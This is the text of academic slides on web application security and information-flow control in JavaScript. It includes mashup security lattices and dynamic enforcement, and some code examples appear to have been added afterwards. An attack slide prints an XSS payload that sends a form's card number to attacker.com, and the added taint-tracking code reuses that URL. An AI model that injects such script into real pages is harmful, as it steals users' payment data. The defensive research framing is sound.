Web application security (comsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited...)
Web application security
From fundamental challenges toward practical solutions
Andrei Sabelfeld, Chalmers
Vint Cerf
• “Father of Internet”
– TCP/IP protocols
• Now at Google
– Vice President, Engineering
– Chief Internet Evangelist
“without security, Internet is incomplete”
“security main challenge for Internet”
Today’s web
• Desktop applications → web applications
– sensitive information is spread between a web server and a web client
– both must be protected along with the communication link between them
• Social networks: the end of privacy?
OWASP top 10, 2010
• A1 - Injection
• A2 - Cross Site Scripting (XSS)
• A3 - Broken Authentication and Session Management
• A4 - Insecure Direct Object Reference
• A5 - Cross Site Request Forgery (CSRF)
• A6 - Security Misconfiguration
• A7 - Insecure Cryptographic Storage
• A8 - Failure to Restrict URL Access
• A9 - Insufficient Transport Layer Protection
• A10 - Unvalidated Redirects and Forwards
OWASP top 10, 2010
• A1 - Injection – undesired information flow in server interpreter (SQL)
• A2 - Cross Site Scripting (XSS) – undesired information flow in client script (JavaScript)
• A3 - Broken Authentication and Session Management – undesired information flow (compromise of password, key, auth tokens, …)
• A4 - Insecure Direct Object Reference – undesired information flow on server side (file, directory, db, key, …)
• A5 - Cross Site Request Forgery (CSRF) – undesired information flow in client script (JavaScript)
• A6 - Security Misconfiguration – undesired information flow policy on server side
• A7 - Insecure Cryptographic Storage
• A8 - Failure to Restrict URL Access
• A9 - Insufficient Transport Layer Protection
• A10 - Unvalidated Redirects and Forwards
(A7–A10: confidentiality and integrity threats via insecure information flow)
Web application security
• Much of a moving target
– Sanitization, cookies, encryption, …
• But some challenges fundamental:
• Policy
– Web inherently decentralized
– Need for policies of mutual distrust
• Enforcement
– Dynamic web programming languages
<!-- Input validation -->
<form name="cform" action="script.cgi" method="post" onsubmit="return checkform();">
<script type="text/javascript">function checkform () {…}</script>
Attack (can be result of XSS)
• Root of the problem: information flow from secret to public
<script>
new Image().src="http://attacker.com/log.cgi?card="+encodeURI(form.CardNumber.value);
</script>
Root of problem: information flow
[Diagram: information flow between Script, Browser, DOM tree and Internet]
Origin-based restrictions
[Diagram: Script, Browser, DOM tree, Internet, with origin-based restrictions on the flows]
• Often too restrictive
Relaxing origin-based restrictions
[Diagram: Script, Browser, DOM tree, Internet, with the origin-based restrictions relaxed]
• Introduces security risks
• Cf. SOP
Information flow controls
[Diagram: Script, Browser, DOM tree, Internet, with information flow controls on the flows]
Information flow problem
public := 0; if secret then public := 1; print(public)
Insecure even when “then” branch not taken – implicit flow
• Studied in 70’s
– military systems
• Revival in 90’s
– mobile code
• Hot topic in language-based security in 00’s
– web application security
Mashups
The problem
[Diagram: an Integrator page embedding gadgets from domains A and B]
• Iframe gadget: <iframe src="B.html"> – NO trust
• JavaScript gadget: <script src="B.js"> – FULL trust
Scenarios
• Dangerous goods
– Google Maps used to track vehicles with dangerous goods
– Full trust in Google Maps
– If Google Maps is broken, so is the dangerous goods web application
• Safe advertising
– Smooth integration of ads desired
– Ads should not maliciously modify web pages
Security lattice [Denning’76]
• Data labeled with security levels
• The higher the more restrictive
• Data is not allowed to flow downward
[Diagram: lattice over the two domains A and B]
Lattice-based approach
• Security levels = sets of Internet domains
[Diagram: Hasse diagrams of the lattices over the domains {A, B} (levels A, B, A,B) and {A, B, C} (levels A, B, C, A,B, A,C, B,C, A,B,C)]
![Page 21: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/21.jpg)
Lattice-based model for scenarios
• Dangerous goods
– Corners of the map declassified from dg.com to google.com
• Safe advertisement
– Ad keywords declassified from my.com to ad.com
• Delimited release [Sabelfeld&Myers’03]
– Only declassified values leak and nothing else
[Diagrams: lattice over dg.com and google.com; lattice over my.com and ad.com]
![Page 22: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/22.jpg)
Mutual distrust
• Domain A “owns” a
• Domain B “owns” b
• Is declassification of a+b allowed?

| Policy(A) | Policy(B) | Target | Allowed? |
|---|---|---|---|
| {(a+b, )} | {(a+b, )} | | |
| {(a+b, )} | {} | | |
| {(a+b, )} | {} | {B} | |
| {(a+b, )} | {(b, )} | | |

[Diagram: lattice over A.com and B.com]
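An added example (my code, not from the talk or the cited papers) of the lattice model on these slides in JavaScript; the ordering on domain sets and the consent rule for mutual distrust are my reading of the slides, stated as assumptions in the comments:

```javascript
// Added example (not from the slides): security levels as sets of Internet
// domains, as on the lattice slide. Reading assumed here: level {A,B} labels
// data confidential to both A and B, the order is subset inclusion ({A,B,C} is
// the most restrictive), join is union, and domain X may observe data only at
// levels contained in {X}.
const level = (...domains) => new Set(domains);
const subset = (s, t) => [...s].every(d => t.has(d));
const setEq = (s, t) => subset(s, t) && subset(t, s);

const leq = (l1, l2) => subset(l1, l2);               // l1 ⊑ l2: flow from l1 to l2 allowed
const join = (l1, l2) => new Set([...l1, ...l2]);     // least upper bound: a+b gets {A,B}
const mayObserve = (x, lvl) => subset(lvl, level(x)); // may domain x see data at lvl?

// Delimited release under mutual distrust. Simplified consent rule assumed
// here (not necessarily the rule of the cited papers): declassifying expression
// e from its computed level to `target` needs an escape hatch [e, target] in
// the policy of every domain that is in e's level but not in the target.
function declassifyAllowed(e, target, ownerOf, policies) {
  const from = e.split('+').reduce((acc, v) => join(acc, level(ownerOf[v])), level());
  if (leq(from, target)) return true;                 // ordinary upward flow, no release needed
  const losingControl = [...from].filter(d => !target.has(d));
  return losingControl.every(d =>
    (policies[d] || []).some(([hatch, t]) => hatch === e && setEq(t, target)));
}

// Constructed cases in the spirit of the table above: A.com owns a, B.com owns
// b, and the question is whether a+b may be declassified to level {B.com}.
function mutualDistrustCases() {
  const ownerOf = { a: 'A.com', b: 'B.com' };
  const toB = level('B.com');
  return [
    // both domains list the hatch: A consents, B keeps its data -> allowed
    declassifyAllowed('a+b', toB, ownerOf, { 'A.com': [['a+b', toB]], 'B.com': [['a+b', toB]] }),
    // only A lists it: B is in the target and loses nothing -> allowed
    declassifyAllowed('a+b', toB, ownerOf, { 'A.com': [['a+b', toB]], 'B.com': [] }),
    // only B lists it: A's consent is missing -> refused
    declassifyAllowed('a+b', toB, ownerOf, { 'A.com': [], 'B.com': [['a+b', toB]] }),
    // A lists a hatch for a alone, not for a+b -> refused
    declassifyAllowed('a+b', toB, ownerOf, { 'A.com': [['a', toB]], 'B.com': [] }),
  ];
}
```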
Enforcement
public := 0; if secret then public := 1; print(public)
Insecure even when “then” branch not taken – implicit flow
• Track information flow in dynamic languages
– JavaScript
• Traditional approach: static analysis
– Jif, FlowCaml, SparkAda, ...
– Not precise enough
• Challenges
– Eval
– Timeouts
– DOM
– Declassification
Implicit flow channel
• Leaks one bit:
if h ≥ k then (h := h − k; l := l + k)
• But can be magnified (h is an n-bit integer):
l := 0; while n ≥ 0 do (k := 2^(n−1); if h ≥ k then (h := h − k; l := l + k); n := n − 1)
≈ l := h
Termination channel
• Leaks one bit:
public := 0; (while secret do skip); print(public)
• Cannot be magnified
– When secret is non-zero, the attack gets stuck
Dynamic enforcement
public := 0; if secret then public := 1; print(public)
No assignments to public variables in secret context
• High-bandwidth implicit flows collapsed into low-bandwidth termination flows
Collapsing into termination channel
• High-bandwidth channels
– Implicit flows [Sabelfeld & Russo’09]
– Declassification [Askarov & Sabelfeld’09]
– DOM tree operations [Russo, Sabelfeld & Chudnov’09]
– Timeouts [Russo & Sabelfeld’09]
– …
• … all collapsed into termination channel
• More permissive than static analysis
– “eval” straightforward [Askarov&Sabelfeld’09]
• Security guarantees
– No information flow (without declassification)
– Composite delimited release
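An added example (my code, not from the talk) of the dynamic enforcement described on the slides above: a small monitor for "no assignments to public variables in secret context", run over the magnification loop from the implicit-flow slide. The `Monitor` class, its label names and the `deps` convention are my constructions.

```javascript
// Added example, not from the slides: a minimal dynamic information-flow
// monitor for the rule "no assignments to public variables in secret context".
// Labels are 'H' (secret) and 'L' (public); `deps` names the variables an
// expression or guard reads; the monitor stops the run on a violation.
const join = (a, b) => (a === 'H' || b === 'H' ? 'H' : 'L');

class Monitor {
  constructor(labels, init) {
    this.labels = { ...labels };   // per-variable labels, e.g. { h: 'H', l: 'L' }
    this.vars = { ...init };
    this.pc = ['L'];               // stack of context labels (program counter label)
  }
  lvl(deps) { return deps.reduce((a, d) => join(a, this.labels[d]), this.pc[this.pc.length - 1]); }
  // x := value, where the value was computed from the variables in `deps`
  assign(x, value, deps = []) {
    if (this.labels[x] === 'L' && this.lvl(deps) === 'H') {
      throw new Error(`stop: assignment to public variable ${x} in secret context`);
    }
    this.vars[x] = value;
  }
  // run f with the pc raised to the label of the guard's dependencies
  inContext(deps, f) {
    this.pc.push(this.lvl(deps));
    try { return f(this.vars); } finally { this.pc.pop(); }
  }
  ifThen(deps, guard, body) { this.inContext(deps, v => { if (guard(v)) body(v); }); }
  whileDo(deps, guard, body) { this.inContext(deps, v => { while (guard(v)) body(v); }); }
}

// The slide's loop without a monitor: h is an n-bit secret, l public; ends with l == h.
function magnify(h, n) {
  let l = 0;
  while (n >= 0) { const k = 2 ** (n - 1); if (h >= k) { h -= k; l += k; } n -= 1; }
  return l;
}
// The same loop under the monitor: returns l if the run completes, 'stopped'
// otherwise. Only h === 0 completes; any other h takes the branch at some point
// and is stopped, so one bit (stopped or not) is all that remains: the
// high-bandwidth implicit flow has collapsed into a termination channel.
function magnifyMonitored(h, n) {
  const m = new Monitor({ h: 'H', l: 'L', n: 'L', k: 'L' }, { h, l: 0, n, k: 0 });
  try {
    m.whileDo(['n'], v => v.n >= 0, v => {
      m.assign('k', 2 ** (v.n - 1), ['n']);
      m.ifThen(['h', 'k'], v => v.h >= v.k, v => {
        m.assign('h', v.h - v.k, ['h', 'k']);
        m.assign('l', v.l + v.k, ['l', 'k']);   // public := ... under a secret pc: stopped here
      });
      m.assign('n', v.n - 1, ['n']);
    });
  } catch (e) { return 'stopped'; }
  return m.vars.l;
}
```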
Case study by Vogt et al. [NDSS’07]
• Extended Firefox with hybrid “tainting” for JavaScript
• Sensitive information (spec from Netscape Navigator 3.0)
• User prompted with an alert when tainted data affects connections outside the origin domain
• Crawled >1M pages
• ~8% triggered alert
• Reduced to ~1% after whitelisting top 30 statistics sites (such as google-analytics.com)

| Object | Tainted properties |
|---|---|
| document | cookie, domain, forms, lastModified, links, referrer, title, URL |
| Form | action |
| any form input element | checked, defaultChecked, defaultValue, name, selectedIndex, toString, value |
| history | current, next, previous, toString |
| Select option | defaultSelected, selected, text, value |
| location and Link | hash, host, hostname, href, pathname, port, protocol, search, toString |
| window | defaultStatus, status |
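An added example (my code, not from the slides or from Vogt et al.'s Firefox extension) of explicit-flow tainting in the spirit of this case study, run over the card-number payload from the earlier attack slide; the `Tainted` wrapper, the `shop.example` origin and the DOM stand-ins are my constructions.

```javascript
// Added example, not code from the slides or from Vogt et al.: a toy
// explicit-flow taint tracker. Reads of the properties in the table above
// come back tainted, taint survives string operations, and a sink check flags
// tainted data bound for a host outside the page's origin domain unless that
// host is whitelisted.
const TAINTED_PROPS = {
  document: ['cookie', 'domain', 'forms', 'lastModified', 'links', 'referrer', 'title', 'URL'],
  input: ['checked', 'defaultChecked', 'defaultValue', 'name', 'selectedIndex', 'toString', 'value'],
  location: ['hash', 'host', 'hostname', 'href', 'pathname', 'port', 'protocol', 'search', 'toString'],
};
class Tainted {
  constructor(value, sources) { this.value = value; this.sources = sources; }
}
const isTainted = v => v instanceof Tainted;
// Property read through the tracker: a sensitive property comes back tainted.
function readProp(obj, kind, prop) {
  const v = obj[prop];
  return (TAINTED_PROPS[kind] || []).includes(prop) ? new Tainted(String(v), [`${kind}.${prop}`]) : v;
}
// String operations propagate taint (explicit flows only; implicit flows are not tracked).
function concat(...parts) {
  const sources = parts.filter(isTainted).flatMap(p => p.sources);
  const value = parts.map(p => (isTainted(p) ? p.value : String(p))).join('');
  return sources.length ? new Tainted(value, sources) : value;
}
const encodeTainted = v => (isTainted(v) ? new Tainted(encodeURI(v.value), v.sources) : encodeURI(v));
// Sink check for a network request such as an Image src assignment.
function checkSink(url, originDomain, whitelist = []) {
  const host = new URL(isTainted(url) ? url.value : url).hostname;
  const sameOrigin = host === originDomain || host.endsWith('.' + originDomain);
  const alert = isTainted(url) && !sameOrigin && !whitelist.includes(host);
  return { alert, host, sources: isTainted(url) ? url.sources : [] };
}
// Constructed run of the XSS payload from the earlier slide on a page at
// shop.example whose form holds a card number (DOM objects are stand-ins).
function checkCardFormPayload(whitelist = []) {
  const form = { CardNumber: { value: '4111111111111111' } };      // constructed sample
  const card = readProp(form.CardNumber, 'input', 'value');        // tainted
  const url = concat('http://attacker.com/log.cgi?card=', encodeTainted(card));
  return checkSink(url, 'shop.example', whitelist);                 // alert: true
}
// Constructed analytics beacon carrying the (tainted) page URL to a whitelisted host.
function checkAnalyticsBeacon() {
  const doc = { URL: 'http://shop.example/checkout' };              // constructed sample
  const url = concat('https://www.google-analytics.com/collect?dl=', encodeTainted(readProp(doc, 'document', 'URL')));
  return checkSink(url, 'shop.example', ['www.google-analytics.com']); // alert: false
}
```

Whitelisting is a host-level decision, so a whitelisted host would receive the tainted value unflagged, which is the trade-off behind the 8% to 1% reduction above.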
Enforcement: implementation
• Base for implementation
– Mashup policies [Magazinius, Askarov & Sabelfeld’10]
– Declassification [Askarov & Sabelfeld’09]
– DOM tree operations [Russo, Sabelfeld & Chudnov’09]
– Timeouts [Russo & Sabelfeld’09]
– Output [Rafnsson & Sabelfeld’10]
• Inlining-based implementation [Magazinius, Russo & Sabelfeld’10]
• FlowSafe project at Mozilla
– dynamic enforcement [Austin & Flanagan’09]
Conclusions
• Web application security is a moving target
– Mutual distrust
– Dynamic web programming languages
• Principled approach
– Lattice-based decentralized security model
– Dynamic enforcement to close high-bandwidth flows
Acknowledgements
A. Askarov, A. Birgisson, W. Rafnsson, J. Magazinius, A. Russo